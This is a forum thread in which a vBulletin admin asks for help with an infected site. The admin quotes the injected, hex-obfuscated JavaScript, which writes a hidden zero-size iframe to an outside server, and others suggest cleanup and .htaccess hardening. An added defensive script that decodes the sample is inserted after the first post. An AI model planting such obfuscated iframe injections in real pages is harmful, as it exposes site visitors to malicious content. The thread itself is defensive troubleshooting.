Need urgent help - Malicious code inserted in my forum
  • #1

    Hi guys, I have a forum running vBulletin 3.6.5 which has been infected this week. The following code appears in the source code of the web site:

    Code:
    <script language='JavaScript'>document.write(unescape('\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x32\x30\x2E\x65\x64\x6F\x69\x73\x2E\x69\x6E\x2F\x78\x2F\x69\x6E\x64\x65\x78\x2E\x70\x68\x70\x3F\x73\x3D\x62\x64\x38\x33\x61\x30\x36\x62\x61\x66\x64\x64\x35\x30\x65\x65\x34\x37\x65\x33\x65\x64\x37\x38\x38\x30\x62\x32\x33\x34\x37\x62\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x20'))</script>
    Which is a hidden iframe leading to the http://20.edois.in server.

    The code is appearing in the header menu options.
    Could you let me know which PHP file is the one for the header?

    thanks
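As an added example (not code from this thread), the script below decodes the hex-escaped document.write(unescape(...)) injection quoted in the post above without executing it, then reports which iframes it would insert and whether they are sized to be invisible. The sample payload is the one from the post, embedded as literal text.

```javascript
// Added example: statically decode the obfuscated injection from the post and
// flag the hidden iframe it would write. SAMPLE_INJECTION is the snippet from
// the post, kept as literal text via String.raw so the JS parser does not
// decode the \x escapes itself (nothing here is ever eval'd or written to a page).
const SAMPLE_INJECTION = String.raw`<script language='JavaScript'>document.write(unescape('\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x32\x30\x2E\x65\x64\x6F\x69\x73\x2E\x69\x6E\x2F\x78\x2F\x69\x6E\x64\x65\x78\x2E\x70\x68\x70\x3F\x73\x3D\x62\x64\x38\x33\x61\x30\x36\x62\x61\x66\x64\x64\x35\x30\x65\x65\x34\x37\x65\x33\x65\x64\x37\x38\x38\x30\x62\x32\x33\x34\x37\x62\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x20'))</script>`;

// Pull the quoted argument out of unescape('...') / unescape("...").
function extractUnescapeArgument(html) {
  const m = html.match(/unescape\(\s*(['"])(.*?)\1\s*\)/);
  return m ? m[2] : null;
}

// Reproduce what the JS parser (\xHH, \uHHHH) and then unescape() (%HH, %uHHHH)
// would turn the string into, using plain string replacement only.
function decodeEscapes(s) {
  const chr = (_, h) => String.fromCharCode(parseInt(h, 16));
  return s
    .replace(/\\x([0-9a-f]{2})/gi, chr)
    .replace(/\\u([0-9a-f]{4})/gi, chr)
    .replace(/%u([0-9a-f]{4})/gi, chr)
    .replace(/%([0-9a-f]{2})/gi, chr);
}

// Returns null when no such injection is present; otherwise the decoded markup
// plus one entry per <iframe>, flagged hidden when width or height is 0.
function analyzeInjection(html) {
  const arg = extractUnescapeArgument(html);
  if (arg === null) return null;
  const markup = decodeEscapes(arg);
  const iframes = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  let tag;
  while ((tag = tagRe.exec(markup)) !== null) {
    const attrs = tag[1];
    const attr = (name) => {
      const a = attrs.match(new RegExp(`\\b${name}\\s*=\\s*["']?([^"'\\s>]*)`, "i"));
      return a ? a[1] : null;
    };
    const src = attr("src") || "";
    let host = null;
    try { host = new URL(src).hostname; } catch (e) { /* relative or malformed src */ }
    const zero = (v) => v !== null && /^0+(px)?$/i.test(v);
    iframes.push({ src, host, hidden: zero(attr("width")) || zero(attr("height")) });
  }
  return { markup, iframes };
}

const report = analyzeInjection(SAMPLE_INJECTION);   // run on the sample from the post
if (report) for (const f of report.iframes) console.log(f.hidden ? "HIDDEN iframe ->" : "iframe ->", f.host, f.src);
```

Run it over a saved copy of an affected page (or a template dumped from the admin panel) to see the decoded markup before deciding which template or plugin to clean.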

  • #2
    It's not injected into your PHP files; the code is either injected into your STYLE - i.e. Headinclude / Header / Footer; or it is injected via a plugin. You will have to look through plugin code in the plugin manager inside individual plugins - typically something that's triggered on the GLOBAL hook.

    It could also have been injected into the datastore; to fix this, click edit on any plugin in the plugin manager - but do not make any changes - click save, this will refresh the data store.
    anders | vbulletin team | check out the new vbulletin facebook app
    Proudly vBulletin'ing since 2001
    Please be my friend!
    http://www.twitter.com/inetskunkworks



    • #3
      Many thanks. Any idea how could this have happened?



      • #4
        Originally posted by enfoque21:
        Many thanks. Any idea how could this have happened?
        Without having intimate knowledge of your products, versioning, server configuration it is impossible to say how this could have happened. I would however suggest you put a basic HTACCESS authorization on your /admincp directory.
        anders | vbulletin team | check out the new vbulletin facebook app
        Proudly vBulletin'ing since 2001
        Please be my friend!
        http://www.twitter.com/inetskunkworks



        • #5
          First use this tool to get rid of the injection:
          http://www.vbulletin.org/forum/showthread.php?t=220967

          Second:
          You need to create a .htaccess file and a .htpasswd in the "ADMINCP" directory on your server! This will create another password for anyone to access the entire directory. Do the same for your "INCLUDES" directory and "INSTALL" directory. I had the same problem you did and this completely closes all back doors and prevents anyone accessing your directories!

          Make sure you use a different username and password than the ones you use to access the admin control panel via the forums. Also encrypt the password with the link below.

          Instructions are here:
          http://www.phpfusion-mods.net/articl...?article_id=23

          Password generator here:
          http://www.htaccesstools.com/htpasswd-generator/

          It will take some time for you to create these files and make them work properly by using the full path - AuthUserFile /full/path/to/.htpasswd

          Once you get it all working correctly a window pops up asking you to enter the username and password when accessing these directories. No one will be able to make any changes except for you and whoever has the htaccess username and password.

          Good luck!
          Skydiving Forums - http://www.skydive-info.com/skydiving
          "If you don't know where you are going, you'll end up some place else." - Yogi Berra
          Home - http://www.Skydive-Info.com



          • #6
            Originally posted by Jump:
            First use this tool to get rid of the injection:
            http://www.vbulletin.org/forum/showthread.php?t=220967

            Second:
            You need to create a .htaccess file and a .htpasswd in the "ADMINCP" directory on your server! This will create another password for anyone to access the entire directory. Do the same for your "INCLUDES" directory and "INSTALL" directory. I had the same problem you did and this completely closes all back doors and prevents anyone accessing your directories!

            Make sure you use a different username and password than the ones you use to access the admin control panel via the forums. Also encrypt the password with the link below.

            Instructions are here:
            http://www.phpfusion-mods.net/articl...?article_id=23

            Password generator here:
            http://www.htaccesstools.com/htpasswd-generator/

            It will take some time for you to create these files and make them work properly by using the full path - AuthUserFile /full/path/to/.htpasswd

            Once you get it all working correctly a window pops up asking you to enter the username and password when accessing these directories. No one will be able to make any changes except for you and whoever has the htaccess username and password.

            Good luck!

            How does this fix the security hole?

            It's still there and it's still usable. Fix your security holes, don't mask them.
            Gentoo Geek



            • #7
              Originally posted by enfoque21:
              Many thanks. Any idea how could this have happened?
              Ask your host to check their access logs around the time of the hack. That will give them an exact overview of how they got in.
